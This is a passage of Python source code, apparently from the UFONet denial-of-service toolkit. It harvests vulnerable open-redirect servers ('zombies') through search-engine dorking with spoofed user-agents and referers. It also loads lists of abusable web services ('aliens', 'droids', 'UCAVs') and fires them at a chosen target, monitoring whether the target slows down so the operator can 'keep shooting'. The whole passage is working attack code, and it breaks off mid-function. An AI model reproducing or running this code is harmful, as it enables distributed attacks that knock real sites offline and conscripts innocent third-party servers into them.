  2646. except (KeyboardInterrupt, SystemExit):
  2647. sys.exit()
  2648. def extract_dorks(self):
  2649. # extract dorks from file (ex: 'dorks.txt')
  2650. try:
  2651. f = open(self.dorks_file)
  2652. dorks = f.readlines()
  2653. dorks = [ dork.replace('\n','') for dork in dorks ]
  2654. f.close()
  2655. if not dorks:
  2656. if not options.autosearch:
  2657. print("[Error] [AI] [Control] Cannot retrieve [Dorks] from: 'botnet/dorks.txt' -> [Aborting!]\n")
  2658. return
  2659. else:
  2660. return dorks
  2661. except:
  2662. if not options.autosearch:
  2663. if os.path.exists(self.dorks_file) == True:
  2664. print("[Error] [AI] [Control] Cannot open [Dorks] from: 'botnet/dorks.txt' -> [Aborting!]\n")
  2665. return #sys.exit(2)
  2666. else:
  2667. print("[Error] [AI] [Control] Cannot found [Dorks] from: 'botnet/dorks.txt' -> [Aborting!]\n")
  2668. return #sys.exit(2)
  2669. else:
  2670. return
  2671. def search_zombies(self, dork, zombies_found):
  2672. # crawlering on search engine results to extract zombies
  2673. options = self.options
  2674. zombies = []
  2675. if not options.engine: # default search engine
  2676. options.engine = 'duck'
  2677. if options.engine == 'bing': # using bing [28/02/2019: OK!]
  2678. url = 'https://www.bing.com/search?'
  2679. if options.search: # search from query
  2680. q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
  2681. if options.dorks or options.autosearch: # search from a dork
  2682. q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
  2683. start = 0 # set index number of first entry
  2684. query_string = { 'q':q, 'first':start }
  2685. data = urllib.parse.urlencode(query_string)
  2686. url = url + data
  2687. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  2688. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  2689. if options.verbose:
  2690. print("[Info] [AI] Query used: " + url)
  2691. print("\n" + '-'*44 + '\n')
  2692. try:
  2693. if options.proxy: # set proxy
  2694. self.proxy_transport(options.proxy)
  2695. req = urllib.request.Request(url, None, headers)
  2696. req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
  2697. except:
  2698. print('[Error] [AI] Unable to connect to: bing\n')
  2699. if options.allengines or options.autosearch:
  2700. return
  2701. if not options.dorks or not options.autosearch:
  2702. if not self.options.forceyes:
  2703. update_reply = input("[AI] Do you want to try a different search engine? (Y/n)")
  2704. else:
  2705. update_reply = "Y"
  2706. if update_reply == "n" or update_reply == "N":
  2707. return #sys.exit(2)
  2708. print("\nSearch engines available:")
  2709. print('-'*25)
  2710. for e in self.search_engines:
  2711. print("+ "+e)
  2712. print('-'*25)
  2713. print("\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'")
  2714. return #sys.exit(2)
  2715. else:
  2716. req_reply = ''
  2717. regex = '<li class="b_algo"><h2><a href="(.+?)">' # regex magics
  2718. pattern = re.compile(regex)
  2719. url_links = re.findall(pattern, req_reply)
  2720. elif options.engine == 'yahoo': # yahoo [28/02/2019: OK!]
  2721. location = ['fr', 'de', 'es', 'nl', 'it', 'se', 'ch', 'jp', 'ru', 'lt'] # evading Yahoo anti-dorking [grey magic: 28/02/2019]
  2722. #location = ['fr', 'de', 'es', 'nl', 'se', 'ch', 'ru'] # [08/04/2017]
  2723. location = str(random.choice(location).strip()) # shuffle location
  2724. if location == "jp": # [28/02/2019]
  2725. url = 'https://search.yahoo.co.jp/search?'
  2726. else:
  2727. url = 'https://'+location+'.search.yahoo.com/search?'
  2728. if options.search: # search from query
  2729. if location == "jp":
  2730. q = '"' + str(options.search) + '"' # set query to search literally on results
  2731. else:
  2732. q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
  2733. if options.dorks or options.autosearch: # search from a dork
  2734. if location == "jp":
  2735. q = '"' + str(dork) + '"' # set query to search literally on results
  2736. else:
  2737. q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
  2738. start = 0 # set index number of first entry
  2739. query_string = { 'p':q, 'b':start }
  2740. data = urllib.parse.urlencode(query_string)
  2741. url = url + data
  2742. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  2743. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  2744. if options.verbose:
  2745. print(("Query used: " + url + "\n"))
  2746. try:
  2747. if options.proxy: # set proxy
  2748. self.proxy_transport(options.proxy)
  2749. req = urllib.request.Request(url, None, headers)
  2750. req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
  2751. except:
  2752. print('[Error] [AI] Unable to connect to: yahoo\n')
  2753. if options.allengines or options.autosearch:
  2754. return
  2755. if not options.dorks or not options.autosearch:
  2756. if not self.options.forceyes:
  2757. update_reply = input("[AI] Do you want to try a different search engine? (Y/n)")
  2758. else:
  2759. update_reply = "Y"
  2760. if update_reply == "n" or update_reply == "N":
  2761. return #sys.exit(2)
  2762. print("\nSearch engines available:")
  2763. print('-'*25)
  2764. for e in self.search_engines:
  2765. print("+ "+e)
  2766. print('-'*25)
  2767. print("\nEx: ufonet -s 'proxy.php?url=' --se 'bing'")
  2768. return #sys.exit(2)
  2769. else:
  2770. req_reply = ''
  2771. #regex = '<h3 class="title"><a style="color:#2C46C7" class=" td-u" href="(.+?)" target="_blank"' # regex magics [18/08/2016]
  2772. regex = 'href="(.+?)" target="_blank" data' # regex magics [08/04/2017]
  2773. pattern = re.compile(regex)
  2774. url_links = re.findall(pattern, req_reply)
  2775. elif options.engine == 'duck': # using duckduckgo [28/02/2019: OK!]
  2776. url = 'https://duckduckgo.com/html/'
  2777. if options.search: # search from query
  2778. q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
  2779. if options.dorks or options.autosearch: # search from a dork
  2780. q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
  2781. query_string = { 'q':q }
  2782. data = urllib.parse.urlencode(query_string)
  2783. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  2784. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  2785. if options.verbose:
  2786. print("Query used: " + url + " (POST: "+ data + ")\n")
  2787. try:
  2788. if options.proxy: # set proxy
  2789. self.proxy_transport(options.proxy)
  2790. req = urllib.request.Request(url, data.encode('utf-8'), headers) # HTTP POST request
  2791. req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
  2792. except:
  2793. print('[Error] [AI] Unable to connect to: duck\n')
  2794. if options.allengines or options.autosearch:
  2795. return
  2796. if not options.dorks or not options.autosearch:
  2797. if not self.options.forceyes:
  2798. update_reply = input("[AI] Do you want to try a different search engine? (Y/n)")
  2799. else:
  2800. update_reply = "Y"
  2801. if update_reply == "n" or update_reply == "N":
  2802. return #sys.exit(2)
  2803. print("\nSearch engines available:")
  2804. print('-'*25)
  2805. for e in self.search_engines:
  2806. print("+ "+e)
  2807. print('-'*25)
  2808. print("\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'")
  2809. return #sys.exit(2)
  2810. else:
  2811. req_reply = ''
  2812. regex = 'snippet" href="(.+?)">' # regex magics
  2813. pattern = re.compile(regex)
  2814. url_links = re.findall(pattern, req_reply)
  2815. else: # no valid search engine
  2816. print('[Error] [AI] This search engine is not supported!\n')
  2817. if not options.dorks or options.autosearch:
  2818. if not self.options.forceyes:
  2819. update_reply = input("[AI] Do you want to try a different search engine? (Y/n)")
  2820. else:
  2821. update_reply = "Y"
  2822. if update_reply == "n" or update_reply == "N":
  2823. return #sys.exit(2)
  2824. print("\nSearch engines available:")
  2825. print('-'*25)
  2826. for e in self.search_engines:
  2827. print("+ "+e)
  2828. print('-'*25)
  2829. print("\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'")
  2830. return #sys.exit(2)
  2831. else:
  2832. req_reply = ''
  2833. if options.num_results: # set number of results to search
  2834. try:
  2835. num = int(options.num_results)
  2836. except:
  2837. print("[Info] [AI] You should specify an integer!... Using default value: 10\n")
  2838. num = 10
  2839. else:
  2840. num = 10
  2841. total_results = 1
  2842. for url in url_links: # general parse on urls
  2843. if int(num) < int(total_results):
  2844. break
  2845. if options.engine == "bing":
  2846. if " h=" in url: # regex magics [18/08/2016]
  2847. url = url.rsplit('" h=',1)[0]
  2848. if options.engine == "yahoo":
  2849. if 'RU=' in url: # regex magics [18/08/2016]
  2850. url = url.rsplit('RU=',1)[1]
  2851. if 'UTF-8&u=' in url: # regex magics [05/02/2018]
  2852. url = url.rsplit('UTF-8&u=',1)[1]
  2853. total_results = total_results + 1 # results counter
  2854. url_link = urllib.parse.unquote(url) # unquote encoding
  2855. if options.search:
  2856. sep = str(options.search)
  2857. if options.dorks or options.autosearch:
  2858. sep = str(dork)
  2859. url_link = url_link.rsplit(sep, 1)[0] + sep
  2860. if 'href="' in url_link:
  2861. url_link = url_link.rsplit('href="', 1)[1]
  2862. if "instreamset" in url_link: # invalid zombie
  2863. url_link = "" # discarded
  2864. if '" ' in url_link:
  2865. url_link = url_link.rsplit('" ', 1)[1]
  2866. if options.engine in url_link:
  2867. url_link = "" # discarded
  2868. if 'http' not in url_link:
  2869. url_link = "" # discarded
  2870. else:
  2871. if url_link not in zombies and url_link+os.linesep not in zombies_found and url_link is not "": # AI mode (parsing search engines mixed pool and stored army)
  2872. print('+Victim found: ' + url_link)
  2873. print('-'*12)
  2874. zombies.append(url_link)
  2875. else:
  2876. pass
  2877. if len(zombies) == 0: # print dorking results
  2878. print("[Info] [AI] NOT any NEW victim(s) found for this query!")
  2879. if not options.dorks:
  2880. if not options.autosearch:
  2881. if not self.options.forceyes:
  2882. return #sys.exit(2)
  2883. print("\n" + '-'*44 + '\n')
  2884. self.total_possible_zombies = self.total_possible_zombies + len(zombies)
  2885. return zombies
  2886. def check_nat(self):
  2887. # check for NAT configuration
  2888. options = self.options
  2889. tor_reply = urllib.request.urlopen(self.check_tor_url).read().decode('utf-8') # check if TOR is enabled
  2890. your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip()
  2891. check_ip_service = None
  2892. if not tor_reply or 'Congratulations' not in tor_reply:
  2893. print("[Info] [AI] It seems that you are not using TOR to recieve data. -> [OK!]\n")
  2894. else:
  2895. print("[Error] [AI] You are using TOR as public IP... It's not possible to NAT! -> [Aborting!]\n")
  2896. self.nat_error_flag = "ON"
  2897. return #sys.exit(2)
  2898. try:
  2899. data = str(urlopen(self.check_ip_service1).read()) # check for public ip
  2900. self.pub_ip = re.compile(r'Address: (\d+\.\d+\.\d+\.\d+)').search(data).group(1)
  2901. check_ip_service = self.check_ip_service1
  2902. except:
  2903. try: # another check for public ip
  2904. data = str(urlopen(self.check_ip_service2).read())
  2905. self.pub_ip = re.compile(r'">(\d+\.\d+\.\d+\.\d+)</span>').search(data).group(1)
  2906. check_ip_service = self.check_ip_service2
  2907. except:
  2908. print("[Error] [AI] Something wrong checking your public IP! -> [Exiting!]\n")
  2909. self.nat_error_flag = "ON"
  2910. return
  2911. t = urlparse(check_ip_service)
  2912. name_service = t.netloc
  2913. print(" + Public: " + self.pub_ip + " | "+name_service+"\n")
  2914. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  2915. s.connect(('8.8.8.8', 0)) # connecting to a UDP address doesn't send packets (black magic)
  2916. self.local_ip = s.getsockname()[0]
  2917. print(" + Local: " + self.local_ip + "\n")
  2918. print('='*22 + '\n')
  2919. def extract_ucavs(self):
  2920. # extract ucavs from file
  2921. options = self.options
  2922. try:
  2923. f = open(self.ucavs_file)
  2924. ucavs = f.readlines()
  2925. ucavs = [ ucav.replace('\n','') for ucav in ucavs ]
  2926. f.close()
  2927. if not ucavs:
  2928. print("[Info] [AI] [Control] Cannot retrieve [UCAVs] from: 'botnet/ucavs.txt' -> [Discarding!]")
  2929. self.options.disableucavs = True
  2930. return
  2931. else:
  2932. return ucavs
  2933. except:
  2934. if os.path.exists(self.ucavs_file) == True:
  2935. print("[Info] [AI] [Control] Cannot open [UCAVs] from: 'botnet/ucavs.txt' -> [Discarding!]")
  2936. return #sys.exit(2)
  2937. else:
  2938. print("[Info] [AI] [Control] Cannot found [UCAVs] from: 'botnet/ucavs.txt' -> [Discarding!]")
  2939. return #sys.exit(2)
  2940. def discarding_ucavs(self, ucav, ucavs):
  2941. if ucav in self.discard_ucavs:
  2942. ucavs.remove(ucav)
  2943. if self.options.verbose:
  2944. print(("[Info] [AI] [Control] [UCAVs] "+str(ucav)+" is not working! -> [Discarding!]"))
  2945. self.ucavs_fail = self.ucavs_fail + 1 # add ucav fail to stats
  2946. return ucavs
  2947. def send_ucavs(self, ucavs):
  2948. # extract external status checkers, perform a request and check results
  2949. time.sleep(5) # aiming (multi-threading flow time compensation)
  2950. if not self.options.disablepurge:
  2951. if not ucavs: # return when not any working
  2952. self.options.disableucavs = True
  2953. return
  2954. options = self.options
  2955. target = self.options.target
  2956. shuffle(ucavs) # shuffle ucavs order, each round :-)
  2957. if not self.options.disablepurge:
  2958. for ucav in ucavs:
  2959. if not ucav.startswith('http'): # discarded inmediately
  2960. self.discard_ucavs.append(ucav)
  2961. self.num_discard_ucavs = self.num_discard_ucavs + 1
  2962. ucavs = self.discarding_ucavs(ucav, ucavs) # check if ucav is failing for autobalance army
  2963. if not self.options.disablepurge:
  2964. if not ucavs: # return when not any working
  2965. self.options.disableucavs = True
  2966. return
  2967. shuffle(ucavs) # shuffle ucavs order, each discarding check :-)
  2968. for ucav in ucavs:
  2969. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  2970. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  2971. if target.startswith("http://"): # parse target for some checkers
  2972. target = target.replace('http://','')
  2973. elif target.startswith("https://"):
  2974. target = target.replace('https://','')
  2975. url = ucav + target
  2976. t = urlparse(ucav)
  2977. name_ucav = t.netloc
  2978. if name_ucav == "":
  2979. name_ucav = ucav
  2980. if options.verbose:
  2981. print(("[Info] [UCAVs] Sniping: " + url))
  2982. try:
  2983. if options.proxy: # set proxy
  2984. self.proxy_transport(options.proxy)
  2985. if options.timeout: # set timeout
  2986. ucav_timeout = options.timeout
  2987. else:
  2988. ucav_timeout = 5
  2989. if ucav_timeout < 1:
  2990. ucav_timeout = 5
  2991. req = urllib.request.Request(url, None, headers)
  2992. target_reply = urllib.request.urlopen(req, context=self.ctx, timeout=ucav_timeout).read().decode('utf-8')
  2993. self.ucavs_hit = self.ucavs_hit + 1 # add ucav hit to stats
  2994. except:
  2995. print("[Info] [UCAVs] " + name_ucav + " -> FAILED (cannot connect!)")
  2996. if not self.options.disablepurge:
  2997. self.discard_ucavs.append(ucav)
  2998. self.num_discard_ucavs = self.num_discard_ucavs + 1
  2999. self.ucavs_fail = self.ucavs_fail + 1 # add ucav fail to stats
  3000. target_reply = ""
  3001. if target_reply == "": # check for target's status resolved by [UCAVs]
  3002. pass
  3003. else:
  3004. if not "is down" or not "looks down" or not "No info found for host" in target_reply: # parse external service for reply
  3005. print("[Info] [UCAVs] " + name_ucav + " -> Target is ONLINE! -> [Keep shooting!]")
  3006. self.num_is_up = self.num_is_up + 1
  3007. else:
  3008. print("[Info] [UCAVs] " + name_ucav + " -> Target looks OFFLINE! -> [Checking!]")
  3009. self.num_is_down = self.num_is_down + 1
  3010. if self.options.verbose:
  3011. print("[Info] [AI] [UCAVs] "+str(name_ucav)+" is returning...")
  3012. self.extra_zombies_lock = False # [ARMY] have finished
  3013. def extract_median(self, num_list):
  3014. # extract median from a list of numbers
  3015. import statistics
  3016. int_num = []
  3017. for num in num_list:
  3018. num = float(num)
  3019. int_num.append(num)
  3020. return statistics.median(int_num)
  3021. def check_is_loading(self, target):
  3022. # perform a broadband test (using GET) to analize target's reply to the traffic generated each round
  3023. self.start = None
  3024. self.stop = None
  3025. print('\n---------')
  3026. print("\n[Info] [AI] Scanning target to check for levels on defensive shields...\n")
  3027. if target.endswith(""):
  3028. target.replace("", "/")
  3029. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  3030. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  3031. try:
  3032. req = urllib.request.Request(target, None, headers)
  3033. if self.options.proxy: # set proxy
  3034. self.proxy_transport(self.options.proxy)
  3035. if self.options.timeout: # set timeout
  3036. try:
  3037. timeout = int(self.options.timeout)
  3038. except:
  3039. timeout = 5
  3040. else:
  3041. timeout = 5
  3042. if timeout < 1:
  3043. timeout = 5
  3044. self.start = time.time()
  3045. target_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
  3046. header = urllib.request.urlopen(req, context=self.ctx).info()
  3047. self.stop = time.time()
  3048. except:
  3049. print('[Info] [AI] Our scanner cannot connect to the target this round! -> [Skipping!]\n')
  3050. return
  3051. try:
  3052. s, size_name = self.convert_size(len(target_reply))
  3053. self.loadcheck_size_list.append(s) # add record to size list
  3054. size = '%s %s' % (s,size_name)
  3055. except:
  3056. size = "Error!"
  3057. try:
  3058. time_required = self.stop - self.start
  3059. load = self.convert_time(time_required)
  3060. self.loadcheck_load_list.append(load) # add record to load list
  3061. except:
  3062. load = "Error!"
  3063. self.loadcheck_counter = self.loadcheck_counter + 1
  3064. print(' -Total tests:', self.loadcheck_counter, "\n")
  3065. if self.loadcheck_prev_size is not None and self.loadcheck_prev_load is not None:
  3066. lsm = self.extract_median(self.loadcheck_size_list)
  3067. if lsm is not None:
  3068. self.loadcheck_size_median = str(lsm) + " " + size_name
  3069. else:
  3070. self.loadcheck_size_median = None
  3071. llm = self.extract_median(self.loadcheck_load_list)
  3072. if llm is not None:
  3073. self.loadcheck_load_median = str(llm) + " seconds"
  3074. else:
  3075. self.loadcheck_load_median = None
  3076. if self.loadcheck_counter == 2: # first round
  3077. print(' -Bytes in (first round) :', self.loadcheck_first_size)
  3078. print(' -Bytes in (this round) :', size)
  3079. if self.loadcheck_size_median is not None:
  3080. print(' -Bytes in (median) :', self.loadcheck_size_median)
  3081. print(' ----')
  3082. print(' -Load time (first round) :', self.loadcheck_first_load, "seconds")
  3083. print(' -Load time (this round) :', load, "seconds")
  3084. if self.loadcheck_load_median is not None:
  3085. print(' -Load time (median) :', self.loadcheck_load_median, "\n")
  3086. else:
  3087. print("\n")
  3088. self.loadcheck_size_max = None
  3089. self.loadcheck_size_min = None
  3090. self.loadcheck_load_max = None
  3091. self.loadcheck_load_min = None
  3092. elif self.loadcheck_counter > 2: # rest of rounds
  3093. lsmax = max(self.loadcheck_size_list)
  3094. if lsmax is not None:
  3095. self.loadcheck_size_max = str(lsmax) + " " + size_name
  3096. else:
  3097. self.loadcheck_size_max = None
  3098. lsmin = min(self.loadcheck_size_list)
  3099. if lsmin is not None:
  3100. self.loadcheck_size_min = str(lsmin) + " " + size_name
  3101. else:
  3102. self.loadcheck_size_min = None
  3103. llmax = max(self.loadcheck_load_list)
  3104. if llmax is not None:
  3105. self.loadcheck_load_max = str(llmax) + " seconds"
  3106. else:
  3107. self.loadcheck_load_max = None
  3108. llmin = min(self.loadcheck_load_list)
  3109. if llmin is not None:
  3110. self.loadcheck_load_min = str(llmin) + " seconds"
  3111. else:
  3112. self.loadcheck_load_min = None
  3113. print(' -Bytes in (first round) :', self.loadcheck_first_size)
  3114. print(' -Bytes in (previous round) :', self.loadcheck_prev_size)
  3115. print(' -Bytes in (this round) :', size)
  3116. if self.loadcheck_size_max is not None:
  3117. print(' -Bytes in (max) :', self.loadcheck_size_max)
  3118. if self.loadcheck_size_min is not None:
  3119. print(' -Bytes in (min) :', self.loadcheck_size_min)
  3120. if self.loadcheck_size_median is not None:
  3121. print(' -Bytes in (median) :', self.loadcheck_size_median)
  3122. print(' ----')
  3123. print(' -Load time (first round) :', self.loadcheck_first_load, "seconds")
  3124. print(' -Load time (previous round):', self.loadcheck_prev_load, "seconds")
  3125. print(' -Load time (this round) :', load, "seconds")
  3126. if self.loadcheck_load_max is not None:
  3127. print(' -Load time (max) :', self.loadcheck_load_max)
  3128. if self.loadcheck_load_min is not None:
  3129. print(' -Load time (min) :', self.loadcheck_load_min)
  3130. if self.loadcheck_load_median is not None:
  3131. print(' -Load time (median) :', self.loadcheck_load_median, "\n")
  3132. else:
  3133. print("\n")
  3134. if self.loadcheck_prev_load < load: # target is loading more slowly
  3135. print("[Info] [AI] [Scanner] Target is serving the content more slowly this round! ;-) -> [Keep shooting!]\n")
  3136. elif self.loadcheck_prev_load == load: # inmutable target
  3137. print("[Info] [AI] [Scanner] Attack is not having any effect on your target this round... -> [Keep shooting!]\n")
  3138. elif self.loadcheck_prev_load > load: # is target defending?
  3139. print("[Info] [AI] [Scanner] Target is loading this round faster than the previous one! -> DETECTED: [PROXY CACHE!!]\n")
  3140. else:
  3141. print(' -Bytes in (this round) :', size)
  3142. print(' -Load time (this round):', load, "seconds\n")
  3143. self.loadcheck_first_size = size
  3144. self.loadcheck_first_load = load
  3145. self.loadcheck_size_median = None
  3146. self.loadcheck_load_median = None
  3147. self.loadcheck_size_max = None
  3148. self.loadcheck_size_min = None
  3149. self.loadcheck_load_max = None
  3150. self.loadcheck_load_min = None
  3151. self.loadcheck_prev_size = size # record previous size
  3152. self.loadcheck_prev_load = load # record previous load
  3153. def convert_size(self, size):
  3154. if (size == 0):
  3155. return '0 B'
  3156. size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
  3157. i = int(math.floor(math.log(size,1024)))
  3158. p = math.pow(1024,i)
  3159. s = round(size/p,2)
  3160. return s, size_name[i]
  3161. def convert_time(self, time):
  3162. return '%.2f' % time
  3163. def discarding_zombies(self, zombie, zombies):
  3164. if zombie in self.discardzombies:
  3165. zombies.remove(zombie)
  3166. if self.options.verbose:
  3167. print(("[Info] [AI] [Control] [Zombies] "+str(zombie)+" is not working! -> [Discarding!]"))
  3168. return zombies
  3169. def send_zombies(self, zombies):
  3170. # send Open Redirect zombies
  3171. time.sleep(1) # aiming (multi-threading flow time compensation)
  3172. if not self.options.disablepurge:
  3173. if not zombies:
  3174. self.empty_zombies = True
  3175. return
  3176. if self.options.verbose:
  3177. print("[Info] [AI] [Control] Deploying [Zombies] with 'maser-melee' weapons...")
  3178. options = self.options
  3179. target = self.options.target
  3180. shuffle(zombies) # shuffle zombies order, each round :-)
  3181. if not self.options.disablepurge:
  3182. for zombie in zombies: # check if zombie is failing for autobalance army
  3183. if not zombie.startswith('http'): # discarded inmediately
  3184. self.discardzombies.append(zombie)
  3185. self.num_discard_zombies = self.num_discard_zombies + 1
  3186. zombies = self.discarding_zombies(zombie, zombies)
  3187. if not self.options.disablepurge:
  3188. if not zombies: # return when not any working
  3189. self.empty_zombies = True
  3190. return
  3191. for zombie in zombies:
  3192. t = urlparse(zombie)
  3193. name_zombie = t.netloc
  3194. if name_zombie == "":
  3195. name_zombie = zombie
  3196. if not self.options.attackme:
  3197. print("[Info] [Zombies] Attacking from: " + name_zombie)
  3198. else: # on attackme, target url is dynamic -> http://public_ip:port/hash|zombie
  3199. self.mothership_hash = random.getrandbits(128) # generating random evasion hash
  3200. target = "http://" + str(self.pub_ip) + ":" + self.port + "/"+ str(self.mothership_hash) + "|" + zombie
  3201. self.options.target = target
  3202. print("[Info] [Zombies] Attacking: " + str(self.pub_ip) + ":" + self.port + " -> [LAN]" + self.local_ip + ":" + self.port)
  3203. print("[Info] [Zombies] Payload: " + target)
  3204. print('='*55, "\n")
  3205. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  3206. if not options.target.startswith('http'):
  3207. if options.forcessl:
  3208. options.target = "https://" + options.target
  3209. else:
  3210. options.target = "http://" + options.target
  3211. self.attack_mode = True
  3212. try:
  3213. if options.verbose:
  3214. print("[Info] [Zombies] Sniping: " + options.target)
  3215. self.connect_zombies(zombie)
  3216. if self.options.dbstress: # try to stress db on target by using vulnerable Open Redirect web servers
  3217. self.db_flash = self.db_flash + 1
  3218. stress = self.stressing(target, zombie)
  3219. except Exception:
  3220. print("[Info] [Zombies] " + zombie + " -> FAILED (cannot connect!)")
  3221. self.total_zombies_failed_connection = self.total_zombies_failed_connection + 1 # used to manage threading pool
  3222. if not self.options.disablepurge:
  3223. self.discardzombies.append(zombie)
  3224. self.num_discard_zombies = self.num_discard_zombies + 1
  3225. if self.options.verbose:
  3226. print("[Info] [AI] [Zombies] "+str(name_zombie)+" is returning...")
  3227. self.attack_mode = False
  3228. def discarding_aliens(self, alien, aliens):
  3229. if alien in self.discard_aliens:
  3230. aliens.remove(alien)
  3231. if self.options.verbose:
  3232. print(("[Info] [AI] [Control] [Aliens] "+str(alien)+" is not working! -> [Discarding!]"))
  3233. self.aliens_fail = self.aliens_fail + 1 # add fail to aliens stats
  3234. return aliens
  3235. def send_aliens(self, aliens):
  3236. # extract external web abuse services urls (POST) and perform requests against target
  3237. time.sleep(2) # aiming (multi-threading flow time compensation)
  3238. if not self.options.disablepurge:
  3239. if not aliens: # return when not any working
  3240. self.options.disablealiens = True
  3241. return
  3242. target = self.options.target
  3243. options = self.options
  3244. shuffle(aliens) # shuffle aliens
  3245. if not self.options.disablepurge:
  3246. for alien in aliens:
  3247. if not alien.startswith('http'): # discarded inmediately
  3248. self.discard_aliens.append(alien)
  3249. self.num_discard_aliens = self.num_discard_aliens + 1
  3250. aliens = self.discarding_aliens(alien, aliens) # check if alien is failing for autobalance army
  3251. if not self.options.disablepurge:
  3252. if not aliens: # return when not any working
  3253. self.options.disablealiens = True
  3254. return
  3255. shuffle(aliens) # shuffle aliens order, each discarding check :-)
  3256. for alien in aliens:
  3257. name_alien = None
  3258. if "$POST" in alien: # extract alien/parameters -> search for $POST delimiter on 'aliens.txt' file
  3259. regex_alien = re.compile('{}(.*){}'.format(re.escape(''), re.escape(';$POST'))) # regex magics
  3260. pattern_alien = re.compile(regex_alien)
  3261. alien_url = re.findall(pattern_alien, alien) # HTTP POST url for submit data
  3262. regex_param = re.compile('{}(.*){}'.format(re.escape('$POST;'), re.escape(''))) # regex magics
  3263. pattern_param = re.compile(regex_param)
  3264. param = re.findall(pattern_param, alien) # HTTP POST params to submit
  3265. for u in alien_url:
  3266. url = u # ex: POST -> path/submit.php
  3267. t = urlparse(url)
  3268. name_alien = t.netloc
  3269. if name_alien == "":
  3270. name_alien = alien
  3271. print("[Info] [Aliens] Attacking from: " + name_alien)
  3272. for p in param:
  3273. param_target = {p : target} # ex POST -> url=target
  3274. param_target = urllib.parse.urlencode(param_target)
  3275. try:
  3276. if options.verbose:
  3277. print("[Info] [Aliens] Sniping: " + url + " - POST:", param_target)
  3278. if options.proxy: # set proxy
  3279. self.proxy_transport(options.proxy)
  3280. if self.options.timeout: # set timeout
  3281. try:
  3282. alien_timeout = int(self.options.timeout)
  3283. except:
  3284. alien_timeout = 5
  3285. else:
  3286. alien_timeout = 5
  3287. if alien_timeout < 1:
  3288. alien_timeout = 5
  3289. req = urllib.request.Request(url, param_target.encode('utf-8'))
  3290. rsp = urllib.request.urlopen(req, context=self.ctx, timeout=alien_timeout)
  3291. self.aliens_hit = self.aliens_hit + 1 # add hit to aliens stats
  3292. except Exception:
  3293. print("[Info] [Aliens] " + name_alien + " -> FAILED (cannot connect!)")
  3294. self.aliens_fail = self.aliens_fail + 1 # add fail to aliens stats
  3295. if not self.options.disablepurge:
  3296. self.discard_aliens.append(alien)
  3297. self.num_discard_aliens = self.num_discard_aliens + 1
  3298. else:
  3299. print(("[Info] [Aliens] "+str(alien)+" -> FAILED (invalid alien!)"))
  3300. self.aliens_fail = self.aliens_fail + 1 # add fail to aliens stats
  3301. if not self.options.disablepurge:
  3302. self.discard_aliens.append(alien)
  3303. self.num_discard_aliens = self.num_discard_aliens + 1
  3304. if self.options.verbose:
  3305. if name_alien:
  3306. print("[Info] [AI] [Aliens] "+str(name_alien)+" is returning...")
  3307. else:
  3308. print("[Info] [AI] [Aliens] "+str(alien)+" is returning...")
  3309. if self.options.disabledroids and self.options.disablerpcs and self.options.disableucavs:
  3310. self.extra_zombies_lock = False # [ARMY] have finished
  3311. def extract_aliens(self):
  3312. # extract aliens from file
  3313. options = self.options
  3314. try:
  3315. f = open(self.aliens_file)
  3316. aliens = f.readlines()
  3317. aliens = [ alien.replace('\n','') for alien in aliens ]
  3318. f.close()
  3319. if not aliens:
  3320. print("[Info] [AI] [Control] Cannot retrieve [Aliens] from: 'botnet/aliens.txt' -> [Discarding!]")
  3321. self.options.disablealiens = True
  3322. return
  3323. else:
  3324. return aliens
  3325. except:
  3326. if os.path.exists(self.aliens_file) == True:
  3327. print("[Info] [AI] [Control] Cannot open [Aliens] from: 'botnet/aliens.txt' -> [Discarding!]")
  3328. return #sys.exit(2)
  3329. else:
  3330. print("[Info] [AI] [Control] Cannot found [Aliens] from: 'botnet/aliens.txt' -> [Discarding!]")
  3331. return #sys.exit(2)
  3332. def discarding_droids(self, droid, droids):
  3333. if droid in self.discard_droids:
  3334. droids.remove(droid)
  3335. if self.options.verbose:
  3336. print(("[Info] [AI] [Control] [Droids] "+str(droid)+" is not working! -> [Discarding!]"))
  3337. self.droids_fail = self.droids_fail + 1 # add fail to droids stats
  3338. return droids
  3339. def send_droids(self, droids):
  3340. # extract external web abuse services urls (GET) and perform requests against target
  3341. time.sleep(3) # aiming (multi-threading flow time compensation)
  3342. if not self.options.disablepurge:
  3343. if not droids: # return when not any working
  3344. self.options.disabledroids = True
  3345. return
  3346. target = self.options.target
  3347. try:
  3348. target = urllib.parse.unquote(target).decode('utf8') # parte urlencoding
  3349. except:
  3350. target = urllib.parse.unquote(target)
  3351. if target.startswith('http://'): # remove http
  3352. target = target.replace('http://', '')
  3353. if target.startswith('https://'):
  3354. target = target.replace('https://', '') # remove https
  3355. options = self.options
  3356. shuffle(droids) # shuffle droids
  3357. if not self.options.disablepurge:
  3358. for droid in droids:
  3359. if not droid.startswith('http'): # discarded inmediately
